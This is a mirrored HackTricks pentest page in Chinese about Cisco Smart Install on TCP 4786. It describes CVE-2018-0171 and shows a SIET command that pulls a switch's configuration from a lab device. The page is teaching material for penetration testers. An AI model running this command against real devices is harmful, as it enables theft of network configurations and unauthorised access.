mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
4.9 KiB
4.9 KiB
4786 - Cisco智能安装
☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一个网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获得官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
基本信息
Cisco智能安装是Cisco设计的用于自动化新Cisco硬件的初始配置和操作系统映像加载的工具。默认情况下,Cisco智能安装在Cisco硬件上处于活动状态,并使用传输层协议TCP,端口号为4786。
**默认端口:**4786
PORT STATE SERVICE
4786/tcp open smart-install
智能安装利用工具
在2018年,发现了一个关键的漏洞,CVE-2018–0171,该漏洞存在于这个协议中。威胁级别在CVSS评分中为9.8。
向活动的Cisco Smart Install的TCP/4786端口发送一个特制的数据包会触发缓冲区溢出,允许攻击者:
- 强制重新启动设备
- 调用RCE
- 窃取网络设备的配置。
开发了 SIET **(智能安装利用工具)来利用这个漏洞,它允许您滥用Cisco Smart Install。在本文中,我将向您展示如何读取合法的网络硬件配置文件。配置外泄对于渗透测试人员来说非常有价值,因为它将了解网络的独特特性。这将使生活更轻松,并允许找到新的攻击向量。
目标设备将是一个“实际”的Cisco Catalyst 2960交换机。虚拟镜像没有Cisco Smart Install,所以您只能在真实硬件上进行实践。
目标交换机的地址是10.10.100.10,CSI是活动的。加载SIET并开始攻击。-g参数表示从设备中外泄配置,-i参数允许您设置易受攻击目标的IP地址。
~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10
交换机配置 10.10.100.10 将位于 tftp/ 文件夹中
\
☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家 网络安全公司 工作吗?想要在 HackTricks 中 宣传你的公司 吗?或者你想要获得 PEASS 的最新版本或下载 HackTricks 的 PDF 版本 吗?请查看 订阅计划!
- 发现我们的独家 NFTs 集合 The PEASS Family
- 获得 官方 PEASS & HackTricks 商品
- 加入 💬 Discord 群组 或 Telegram 群组,或者在 Twitter 上 关注 我 🐦@carlospolopm。
- 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。